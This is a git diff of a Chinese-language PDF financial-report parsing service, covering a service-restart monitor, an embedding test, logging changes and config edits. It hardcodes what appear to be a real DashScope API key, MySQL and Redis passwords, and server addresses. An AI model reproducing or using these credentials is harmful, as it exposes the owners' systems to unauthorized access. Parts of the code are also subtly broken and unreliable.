Compare commits
2 Commits
main
...
pdf-dsw-20
Author | SHA1 | Date |
---|---|---|
|
edbcc245a6 | |
|
24764099c4 |
|
@ -0,0 +1,58 @@
|
|||
import socket
|
||||
import subprocess
|
||||
import time
|
||||
from datetime import datetime
|
||||
|
||||
def get_time():
|
||||
return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
|
||||
|
||||
|
||||
def check_port(host, port):
|
||||
try:
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.settimeout(5)
|
||||
result = sock.connect_ex((host, port))
|
||||
sock.close()
|
||||
return result
|
||||
except Exception as e:
|
||||
print(f"[{get_time()}] 端口检测异常: {str(e)}")
|
||||
return False
|
||||
|
||||
|
||||
|
||||
def restart_service():
|
||||
try:
|
||||
subprocess.run("bash /root/docker/milvus/standalone_embed.sh restart", shell=True)
|
||||
# 正确示例
|
||||
# subprocess.run(["bash", "standalone_embed.sh", "restart"])
|
||||
print(f"[{get_time()}] milvus服务重启成功")
|
||||
return True
|
||||
except subprocess.CalledProcessError as e:
|
||||
print(f"[{get_time()}] 服务重启失败: {str(e)}")
|
||||
return False
|
||||
|
||||
|
||||
def restart_zzbservice():
|
||||
try:
|
||||
subprocess.run("cd /root/pdf_parser/zzb_data_prod", shell=True)
|
||||
subprocess.run("nohup python3 app.py > app.log 2>&1 &", shell=True)
|
||||
print("zzb服务重启成功")
|
||||
return True
|
||||
except subprocess.CalledProcessError as e:
|
||||
print(f"[{get_time()}] zzb服务重启失败: {str(e)}")
|
||||
|
||||
if __name__ == '__main__':
|
||||
print(f"[{get_time()}] 启动Milvus监控服务")
|
||||
port_ok = check_port("127.0.0.1", 19530)
|
||||
if port_ok not in [0,True]:
|
||||
print("检测到Milvus服务异常,尝试重启...")
|
||||
restart_service()
|
||||
|
||||
print(f"[{get_time()}] 启动zzb监控服务")
|
||||
port_ok = check_port("127.0.0.1", 8000)
|
||||
|
||||
if port_ok not in [0,True]:
|
||||
print("检测到zzb服务异常,尝试重启...")
|
||||
restart_zzbservice()
|
||||
|
||||
|
Binary file not shown.
|
@ -0,0 +1,99 @@
|
|||
# Requires transformers>=4.51.0
|
||||
|
||||
import torch
|
||||
import torch.nn.functional as F
|
||||
|
||||
from torch import Tensor
|
||||
from modelscope import AutoTokenizer, AutoModel
|
||||
import datetime
|
||||
import dashscope
|
||||
from http import HTTPStatus
|
||||
|
||||
|
||||
dashscope.api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
|
||||
|
||||
def embed_with_str(input):
|
||||
retry = 0
|
||||
max_retry = 5
|
||||
t = 0.2
|
||||
while retry < max_retry:
|
||||
# time.sleep(t)
|
||||
#阿里接口限流
|
||||
resp = dashscope.TextEmbedding.call(
|
||||
model=dashscope.TextEmbedding.Models.text_embedding_v2,
|
||||
input=input)
|
||||
if resp.status_code == HTTPStatus.OK:
|
||||
return resp
|
||||
elif resp.status_code == 429:
|
||||
logger.info(f'触发限流,等待{t}秒后重试')
|
||||
retry += 1
|
||||
t+=0.1
|
||||
else:
|
||||
logger.error(f'请求失败,状态码:{resp.status_code}')
|
||||
return None
|
||||
logger.error('重试超过上限')
|
||||
return None
|
||||
|
||||
def last_token_pool(last_hidden_states: Tensor,
|
||||
attention_mask: Tensor) -> Tensor:
|
||||
left_padding = (attention_mask[:, -1].sum() == attention_mask.shape[0])
|
||||
if left_padding:
|
||||
return last_hidden_states[:, -1]
|
||||
else:
|
||||
sequence_lengths = attention_mask.sum(dim=1) - 1
|
||||
batch_size = last_hidden_states.shape[0]
|
||||
return last_hidden_states[torch.arange(batch_size, device=last_hidden_states.device), sequence_lengths]
|
||||
|
||||
|
||||
def get_detailed_instruct(task_description: str, query: str) -> str:
|
||||
return f'Instruct: {task_description}\nQuery:{query}'
|
||||
|
||||
# Each query must come with a one-sentence instruction that describes the task
|
||||
task = 'Given a web search query, retrieve relevant passages that answer the query'
|
||||
|
||||
queries = [
|
||||
get_detailed_instruct(task, 'What is the capital of China?'),
|
||||
get_detailed_instruct(task, 'Explain gravity')
|
||||
]
|
||||
# No need to add instruction for retrieval documents
|
||||
documents = [
|
||||
"The capital of China is Beijing.",
|
||||
"Gravity is a force that attracts two bodies towards each other. It gives weight to physical objects and is responsible for the movement of planets around the sun."
|
||||
]
|
||||
input_texts = queries + documents
|
||||
|
||||
tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B', padding_side='left')
|
||||
model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B')
|
||||
|
||||
# We recommend enabling flash_attention_2 for better acceleration and memory saving.
|
||||
# model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B', attn_implementation="flash_attention_2", torch_dtype=torch.float16).cuda()
|
||||
print(datetime.datetime.now())
|
||||
max_length = 8192
|
||||
|
||||
# Tokenize the input texts
|
||||
batch_dict = tokenizer(
|
||||
input_texts,
|
||||
padding=True,
|
||||
truncation=True,
|
||||
max_length=max_length,
|
||||
return_tensors="pt",
|
||||
)
|
||||
batch_dict.to(model.device)
|
||||
outputs = model(**batch_dict)
|
||||
|
||||
|
||||
embeddings = last_token_pool(outputs.last_hidden_state, batch_dict['attention_mask'])
|
||||
|
||||
# normalize embeddings
|
||||
embeddings = F.normalize(embeddings, p=2, dim=1)
|
||||
print(f"=========embeddings=========")
|
||||
print(datetime.datetime.now())
|
||||
|
||||
scores = (embeddings[:2] @ embeddings[2:].T)
|
||||
print(len(embeddings.tolist()[0]))
|
||||
# [[0.7645568251609802, 0.14142508804798126], [0.13549736142158508, 0.5999549627304077]]
|
||||
|
||||
|
||||
vector_obj = embed_with_str(input_texts)
|
||||
vector = vector_obj.output["embeddings"][0]["embedding"]
|
||||
print(len(vector))
|
|
@ -1,9 +1,11 @@
|
|||
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
|
||||
from config import MILVUS_CLIENT
|
||||
import time
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
def create_partition_by_hour(current_hour):
|
||||
# 连接到 Milvus 服务器
|
||||
connections.connect("default",uri=MILVUS_CLIENT)
|
||||
connections.connect(uri=MILVUS_CLIENT)
|
||||
# 获取集合
|
||||
collection_name = "pdf_measure_v4"
|
||||
collection = Collection(collection_name)
|
||||
|
@ -32,37 +34,6 @@ def create_partition_by_hour(current_hour):
|
|||
|
||||
|
||||
|
||||
# data = []
|
||||
# measure_data = {}
|
||||
# vector = [0.61865162262130161] * 1536
|
||||
# measure_data['vector'] = vector
|
||||
# measure_data['table_num'] = int(2)
|
||||
# measure_data['table_index'] = int(2)
|
||||
# measure_data['measure_name'] = "234234"
|
||||
# measure_data['measure_value'] = "23432"
|
||||
# measure_data['measure_unit'] = "123423"
|
||||
# measure_data['file_id'] = "100000"
|
||||
#
|
||||
# data.append(measure_data)
|
||||
# res = client.insert(
|
||||
# collection_name=collection_name,
|
||||
# data=data,
|
||||
# partition_name=partition_name
|
||||
# )
|
||||
|
||||
# filter_str = 'file_id == "'+"2122"+'"'
|
||||
# res = client.search(
|
||||
# collection_name=collection_name, # Replace with the actual name of your collection
|
||||
# # Replace with your query vector
|
||||
# data=data,
|
||||
# limit=3, # Max. number of search results to return
|
||||
# search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
|
||||
# output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
|
||||
# filter=filter_str,
|
||||
# partition_name=partition_name
|
||||
# )
|
||||
# print(f"============================={res}")
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -98,4 +69,4 @@ def create_partition_by_hour(current_hour):
|
|||
# "params": {"nlist": 128}
|
||||
# }
|
||||
# collection.create_index(field_name="vector", index_params=index_params)
|
||||
# collection.load()
|
||||
# collection.load()
|
||||
|
|
|
@ -14,10 +14,10 @@ import db_service
|
|||
import threading
|
||||
from Mil_unit import create_partition_by_hour
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
from log_config import logger
|
||||
|
||||
app = FastAPI()
|
||||
cpu_count = os.cpu_count()
|
||||
cpu_count = 4
|
||||
job_queue = queue.Queue()
|
||||
|
||||
# 定义请求体模型
|
||||
|
@ -30,7 +30,7 @@ def run_job():
|
|||
if_run = True
|
||||
|
||||
if job_queue.empty():
|
||||
print(f"job_queue为空: {file_path}")
|
||||
logger.info(f"job_queue为空: {file_path}")
|
||||
if_run = False
|
||||
|
||||
if if_run:
|
||||
|
@ -43,29 +43,19 @@ def run_job():
|
|||
try:
|
||||
#下载pdf
|
||||
start_time = time.time()
|
||||
print(f"开始启动文件解析任务: {file_path}")
|
||||
logger.info(f"开始启动文件解析任务: {file_path}")
|
||||
if file_path.startswith('http'):
|
||||
file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH)
|
||||
try:
|
||||
file_info = pdf_title.create_text_outline(file_path,file_id)
|
||||
except Exception as e:
|
||||
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7})
|
||||
print(f'通知任务状态url:{file_id}:{response.url}')
|
||||
print(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
print(f"{file_id}运行失败: {e}")
|
||||
logger.info(f'通知任务状态url:{file_id}:{response.url}')
|
||||
logger.info(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
logger.info(f"{file_id}运行失败: {e}")
|
||||
continue_execution = False
|
||||
if continue_execution:
|
||||
print(cpu_count)
|
||||
parent_table_pages = file_info['parent_table_pages']
|
||||
print('parent_table_pages的值是')
|
||||
print(parent_table_pages)
|
||||
|
||||
# page_nums = [
|
||||
# '1-3',
|
||||
# '4-6',
|
||||
# ]
|
||||
print(cpu_count)
|
||||
print('测试')
|
||||
page_num = file_info['page_count']
|
||||
if page_num < cpu_count:
|
||||
p_count = page_num
|
||||
|
@ -73,7 +63,6 @@ def run_job():
|
|||
p_count = cpu_count
|
||||
|
||||
for i in range(p_count):
|
||||
# for i in range(2):
|
||||
page_list.append({
|
||||
'type': 'table',
|
||||
'page_num': file_info['split_parts']['table_split_parts'][i],
|
||||
|
@ -88,8 +77,8 @@ def run_job():
|
|||
|
||||
# 通知开始解析
|
||||
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5})
|
||||
print(f'通知pdf开始解析url:{file_id}:{response.url}')
|
||||
print(f'通知pdf开始解析状态:{file_id}:{response.text}')
|
||||
logger.info(f'通知pdf开始解析url:{file_id}:{response.url}')
|
||||
logger.info(f'通知pdf开始解析状态:{file_id}:{response.text}')
|
||||
parser_start_time = time.time()
|
||||
processes = []
|
||||
time_dispatch_job = time.time()
|
||||
|
@ -98,30 +87,27 @@ def run_job():
|
|||
p = Process(target=main.dispatch_job, args=(job_info,))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
#time_dispatch_job_end = time.time()
|
||||
#process_time = time_dispatch_job_end - time_dispatch_job
|
||||
#db_service.process_time(file_id,'1',process_time)
|
||||
|
||||
print('等待所有子任务完成,任务ID:', file_id)
|
||||
|
||||
logger.info(f'等待所有子任务完成,任务ID:{file_id}')
|
||||
for p in processes:
|
||||
p.join()
|
||||
print('pdf解析任务完成任务完成,任务ID:', file_id)
|
||||
logger.info(f'pdf解析任务完成任务完成,任务ID:{file_id}')
|
||||
time_dispatch_job_end = time.time()
|
||||
process_time = time_dispatch_job_end - time_dispatch_job
|
||||
db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end)
|
||||
parser_end_time = time.time()
|
||||
print(f"解析任务 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
logger.info(f"解析任务 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
#这里做一步判断,看看是否还要继续。
|
||||
if db_service.file_type_check(file_id):
|
||||
print("文本较真表格生成已结束")
|
||||
logger.info(f"文本较真表格生成已结束")
|
||||
else:
|
||||
# 通知抽取指标
|
||||
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6})
|
||||
print(f'通知开始抽取指标url:{file_id}:{response.url}')
|
||||
print(f'通知开始抽取指标状态:{file_id}:{response.text}')
|
||||
logger.info(f'通知开始抽取指标url:{file_id}:{response.url}')
|
||||
logger.info(f'通知开始抽取指标状态:{file_id}:{response.text}')
|
||||
|
||||
parser_start_time = time.time()
|
||||
print('开始表格指标抽取,任务ID:', file_id)
|
||||
logger.info(f'开始表格指标抽取,任务ID:{file_id}')
|
||||
time_start = time.time()
|
||||
|
||||
|
||||
|
@ -131,6 +117,7 @@ def run_job():
|
|||
partition_name = f"partition_{current_hour}"
|
||||
# 判断是否创建新的分区
|
||||
create_partition_by_hour(current_hour)
|
||||
time.sleep(10)
|
||||
# 判断是否为3季报
|
||||
|
||||
if db_service.file_type_check_v2(file_id) == 3:
|
||||
|
@ -138,17 +125,17 @@ def run_job():
|
|||
time_start_end = time.time()
|
||||
process_time = time_start_end - time_start
|
||||
db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
|
||||
print('表格指标抽取完成,任务ID:', file_id)
|
||||
logger.info(f'表格指标抽取完成,任务ID:{file_id}')
|
||||
parser_end_time = time.time()
|
||||
print(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
logger.info(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
|
||||
print('启动这个指标归一化任务ID-修改测试:', file_id)
|
||||
logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
|
||||
time_update = time.time()
|
||||
main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
|
||||
|
||||
print('归一化完成任务ID:', file_id)
|
||||
logger.info(f'归一化完成任务ID:{file_id}')
|
||||
end_time = time.time()
|
||||
print(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
|
||||
time_update_end = time.time()
|
||||
process_time = time_update_end - time_update
|
||||
db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
|
||||
|
@ -158,25 +145,25 @@ def run_job():
|
|||
time_start_end = time.time()
|
||||
process_time = time_start_end - time_start
|
||||
db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
|
||||
print('表格指标抽取完成,任务ID:', file_id)
|
||||
logger.info(f'表格指标抽取完成,任务ID:{file_id}')
|
||||
parser_end_time = time.time()
|
||||
print(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
logger.info(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
|
||||
|
||||
print('启动这个指标归一化任务ID-修改测试:', file_id)
|
||||
logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
|
||||
time_update = time.time()
|
||||
main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
|
||||
|
||||
print('归一化完成任务ID:', file_id)
|
||||
logger.info(f'归一化完成任务ID:{file_id}')
|
||||
end_time = time.time()
|
||||
print(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
|
||||
time_update_end = time.time()
|
||||
process_time = time_update_end - time_update
|
||||
db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
|
||||
#通知任务完成
|
||||
response_time = time.time()
|
||||
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1})
|
||||
print(f'通知任务状态url:{file_id}:{response.url}')
|
||||
print(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
logger.info(f'通知任务状态url:{file_id}:{response.url}')
|
||||
logger.info(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
response_time_end = time.time()
|
||||
process_time = response_time_end - response_time
|
||||
db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
|
||||
|
@ -191,17 +178,17 @@ def run_job():
|
|||
response_time_end = time.time()
|
||||
process_time = response_time_end - response_time
|
||||
db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
|
||||
print(f'通知任务状态url:{file_id}:{response.url}')
|
||||
print(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
print(f"Response status code: {response.status_code}")
|
||||
print(f"{file_id}运行失败: {e}")
|
||||
logger.info(f'通知任务状态url:{file_id}:{response.url}')
|
||||
logger.info(f'通知任务状态任务:{file_id}:{response.text}')
|
||||
logger.info(f"Response status code: {response.status_code}")
|
||||
logger.info(f"{file_id}运行失败: {e}")
|
||||
finally:
|
||||
print(f"任务 {file_id} 完成,运行状态:{job_status}")
|
||||
logger.info(f"任务 {file_id} 完成,运行状态:{job_status}")
|
||||
|
||||
#pdf_company_0824.name_code_fix(file_id,file_path)
|
||||
#print('公司名与编码填充完毕')
|
||||
else:
|
||||
print("有任务运行中,需要等待.....")
|
||||
logger.info(f"有任务运行中,需要等待.....")
|
||||
|
||||
def parse_pdf_route(fileItem: FileItem):
|
||||
|
||||
|
@ -210,7 +197,7 @@ def parse_pdf_route(fileItem: FileItem):
|
|||
'file_path' : fileItem.file_path,
|
||||
'file_id' : fileItem.file_id
|
||||
})
|
||||
print(f"增加 {fileItem.file_id} 到队列.")
|
||||
logger.info(f"增加 {fileItem.file_id} 到队列.")
|
||||
|
||||
threading.Thread(target=run_job, args=()).start()
|
||||
|
||||
|
@ -221,16 +208,37 @@ app.post("/parser/start",
|
|||
summary="解析Pdf文件",
|
||||
)(parse_pdf_route)
|
||||
|
||||
def get_local_ip():
|
||||
try:
|
||||
# 创建一个 UDP 套接字
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
# 连接到一个外部地址(这里使用 Google 的公共 DNS 服务器)
|
||||
s.connect(("8.8.8.8", 80))
|
||||
# 获取本地套接字的 IP 地址
|
||||
local_ip = s.getsockname()[0]
|
||||
except Exception as e:
|
||||
logger.info(f"获取内网 IP 失败: {e}")
|
||||
local_ip = "127.0.0.1" # 如果失败,返回本地回环地址
|
||||
finally:
|
||||
s.close() # 关闭套接字
|
||||
return local_ip
|
||||
|
||||
# 运行 FastAPI 应用
|
||||
if __name__ == "__main__":
|
||||
# 服务器启动服务
|
||||
# import uvicorn
|
||||
# uvicorn.run(app, host="0.0.0.0", port=config.PORT)
|
||||
import uvicorn
|
||||
uvicorn.run(app, host="0.0.0.0", port=config.PORT)
|
||||
try:
|
||||
# 获取内网IP
|
||||
ip = get_local_ip()
|
||||
response = requests.get(f"/api/tenant/report/restart?address={ip}:{config.PORT}")
|
||||
except KeyboardInterrupt:
|
||||
logger.info("Shutdown server")
|
||||
|
||||
# 本地调试任务
|
||||
job_queue.put({
|
||||
'file_path' : '3.pdf',
|
||||
'file_id' : '2122'
|
||||
})
|
||||
|
||||
run_job()
|
||||
# job_queue.put({
|
||||
# 'file_path' : '1.pdf',
|
||||
# 'file_id' : '2122'
|
||||
# })
|
||||
#
|
||||
# run_job()
|
||||
|
|
Binary file not shown.
|
@ -1,28 +1,28 @@
|
|||
MILVUS_CLIENT='http://124.70.129.232:19530'
|
||||
#MILVUS_CLIENT='http://60.204.228.154:19530'
|
||||
MYSQL_HOST = '121.37.185.246'
|
||||
MILVUS_CLIENT='http://127.0.0.1:19530'
|
||||
MILVUS_HOST = '127.0.0.1'
|
||||
MILVUS_PORT = 19530
|
||||
MYSQL_HOST = '10.127.2.207'
|
||||
MYSQL_PORT = 3306
|
||||
MYSQL_USER = 'financial'
|
||||
MYSQL_PASSWORD = 'financial_8000'
|
||||
MYSQL_DB = 'financial_report'
|
||||
NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
|
||||
NOTIFY_ADDR_DIS = 'http://127.0.0.1:8100/api/tenant/info/notify'
|
||||
REDIS_HOST = '123.60.153.169'
|
||||
MYSQL_USER = 'financial_prod'
|
||||
MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
|
||||
MYSQL_DB = 'financial_report_test'
|
||||
NOTIFY_ADDR = 'http://10.127.2.206:8101/api/tenant/report/notify'
|
||||
FILE_PATH = '/root/pdf_parser/pdf/'
|
||||
REDIS_HOST = '10.127.2.206'
|
||||
REDIS_PORT = 6379
|
||||
REDIS_PASSWORD = 'Xgf_redis'
|
||||
FILE_PATH = '/root/pdf_parser/pdf/'
|
||||
PORT = 8000
|
||||
MEASURE_COUNT = 8
|
||||
MEASURE_COUNT = 4
|
||||
|
||||
|
||||
MYSQL_HOST_APP = '121.37.185.246'
|
||||
MYSQL_HOST_APP = '10.127.2.207'
|
||||
MYSQL_PORT_APP = 3306
|
||||
MYSQL_USER_APP = 'financial'
|
||||
MYSQL_PASSWORD_APP = 'financial_8000'
|
||||
MYSQL_DB_APP = 'financial_report'
|
||||
MYSQL_USER_APP = 'financial_prod'
|
||||
MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
|
||||
MYSQL_DB_APP = 'financial_report_test'
|
||||
|
||||
|
||||
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
|
||||
# 'sk-3cc9e1601f654c149d2a4e99ef8a8946'
|
||||
|
||||
|
||||
#MYSQL_HOST_APP = '192.168.0.201'
|
||||
#MYSQL_PORT_APP = 3306
|
||||
#MYSQL_USER_APP = 'root'
|
||||
#MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
|
||||
#MYSQL_DB_APP = 'financial_report_prod'
|
||||
|
|
|
@ -10,6 +10,9 @@ from pymilvus import MilvusClient
|
|||
import mysql.connector
|
||||
import threading
|
||||
import redis
|
||||
from log_config import logger
|
||||
|
||||
|
||||
|
||||
measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"]
|
||||
# 解析大模型抽取的指标,并插入到数据库
|
||||
|
@ -133,9 +136,9 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
|
|||
WHERE file_id = %s AND page_num = %s AND table_index = %s
|
||||
'''
|
||||
cursor.execute(update_query, (unit, file_id, page_num, table_index))
|
||||
#print(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
|
||||
logger.info(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
|
||||
else:
|
||||
print(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
|
||||
logger.info(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
|
||||
else:
|
||||
# 插入新的记录
|
||||
insert_query = '''
|
||||
|
@ -145,7 +148,7 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
|
|||
'''
|
||||
data_to_insert = (file_id, page_num, table_index, unit)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
#print(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
|
||||
logger.info(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
|
||||
|
||||
conn.commit()
|
||||
|
||||
|
@ -190,6 +193,16 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
and t1.file_id = '{file_id}'
|
||||
and t2.year = '{year}'
|
||||
'''.format(file_id=file_id, year=report_year)
|
||||
select_query_first = '''
|
||||
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
|
||||
FROM ori_measure_list t1
|
||||
left join
|
||||
measure_config_first_quarter t2
|
||||
on t1.ori_measure_id = t2.ori_measure_id
|
||||
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
|
||||
and t1.file_id = '{file_id}'
|
||||
and t2.year = '{year}'
|
||||
'''.format(file_id=file_id, year=report_year)
|
||||
select_query_half_year = '''
|
||||
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
|
||||
FROM ori_measure_list t1
|
||||
|
@ -205,59 +218,73 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
FROM ori_measure_list t1
|
||||
left join
|
||||
measure_config_third_quarter t2
|
||||
on t1.ori_measure_id = t2.ori_measure_id
|
||||
on t1.ori_measure_id = t2.ori_measure_id
|
||||
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
|
||||
and t1.file_id = '{file_id}'
|
||||
and t2.year = '{year}'
|
||||
'''.format(file_id=file_id, year=report_year)
|
||||
|
||||
if report_type == 1:
|
||||
if report_type == 1:#半年报
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_half_year)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print(f'update_ori_measure方法走的是半年报')
|
||||
elif report_type == 3:
|
||||
logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'update_ori_measure方法走的是半年报')
|
||||
elif report_type == 2: # 一季报
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_first)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'update_ori_measure方法走的是一季报')
|
||||
elif report_type == 3: # 三季报
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_thrid)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print(f'update_ori_measure方法走的是三季报')
|
||||
else:
|
||||
logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'update_ori_measure方法走的是三季报')
|
||||
else:# 年报
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
print(f'update_ori_measure方法走的是全年报')
|
||||
logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f'update_ori_measure方法走的是全年报')
|
||||
start_time = time.time()
|
||||
for record in records:
|
||||
data_to_update = (record[0], record[1], record[2], file_id)
|
||||
cursor.execute(update_query, data_to_update)
|
||||
conn.commit()
|
||||
end_time = time.time()
|
||||
print(f"更新数据更新 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"更新数据更新 {(end_time - start_time):.2f} 秒。")
|
||||
#更新measure_list表,增加此次文件的显示指标
|
||||
start_time = time.time()
|
||||
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
||||
if report_type == 0:
|
||||
if report_type == 0:#全年报
|
||||
insert_query = '''
|
||||
INSERT INTO measure_list
|
||||
(measure_id, measure_name, create_time, update_time, file_id)
|
||||
select distinct measure_id,measure_name, %s,%s,%s from measure_config
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
elif report_type == 3:
|
||||
elif report_type == 2:# 一季报
|
||||
insert_query = '''
|
||||
INSERT INTO measure_list
|
||||
(measure_id, measure_name, create_time, update_time, file_id)
|
||||
select distinct measure_id,measure_name, %s,%s,%s from measure_config_first_quarter
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
elif report_type == 3:# 三季报
|
||||
insert_query = '''
|
||||
INSERT INTO measure_list
|
||||
(measure_id, measure_name, create_time, update_time, file_id)
|
||||
select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
else:
|
||||
else:# 半年报
|
||||
insert_query = '''
|
||||
INSERT INTO measure_list
|
||||
(measure_id, measure_name, create_time, update_time, file_id)
|
||||
|
@ -269,13 +296,13 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
cursor.execute(insert_query, data_to_update)
|
||||
conn.commit()
|
||||
end_time = time.time()
|
||||
print(f"更新数据写入 {(end_time - start_time):.2f} 秒。")
|
||||
logger.info(f"更新数据写入 {(end_time - start_time):.2f} 秒。")
|
||||
|
||||
def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,):
|
||||
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
|
||||
|
||||
print('Run task %s (%s)...' % (record_range, os.getpid()))
|
||||
print(f"插入数据 {len(records)}")
|
||||
logger.info(f'Run task {record_range} ({os.getpid()})...')
|
||||
logger.info(f"插入数据 {len(records)}")
|
||||
|
||||
|
||||
conn = mysql.connector.connect(
|
||||
|
@ -332,11 +359,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
|
||||
cursor_app.execute(select_parent_query)
|
||||
parent_records = cursor_app.fetchall()
|
||||
#print(f"before: {parent_table_pages}")
|
||||
|
||||
|
||||
for parent_record in parent_records:
|
||||
parent_id = parent_record[0]
|
||||
parent_table_pages.append(int(parent_id))
|
||||
#print(f"after: {parent_table_pages}")
|
||||
|
||||
|
||||
#表格上方文字黑名单关键词的页码和表格下标转成数组
|
||||
table_index_array = []
|
||||
|
@ -348,15 +376,19 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
measure_index_array = []
|
||||
cursor_app.execute(select_measure_index_query, (file_id,))
|
||||
measure_index_records = cursor_app.fetchall()
|
||||
print("Executing SQL:", select_measure_index_query)
|
||||
print("With file_id:", file_id)
|
||||
logger.info(f"Executing SQL:{select_measure_index_query}")
|
||||
logger.info(f"With file_id:{file_id}")
|
||||
for measure_index_record in measure_index_records:
|
||||
measure_index_array.append(measure_index_record[0])
|
||||
print(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
|
||||
logger.info(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
|
||||
#print(f'黑名单的值是{parent_table_pages}和{table_index_array}')
|
||||
record_start = record_range.split('-')[0]
|
||||
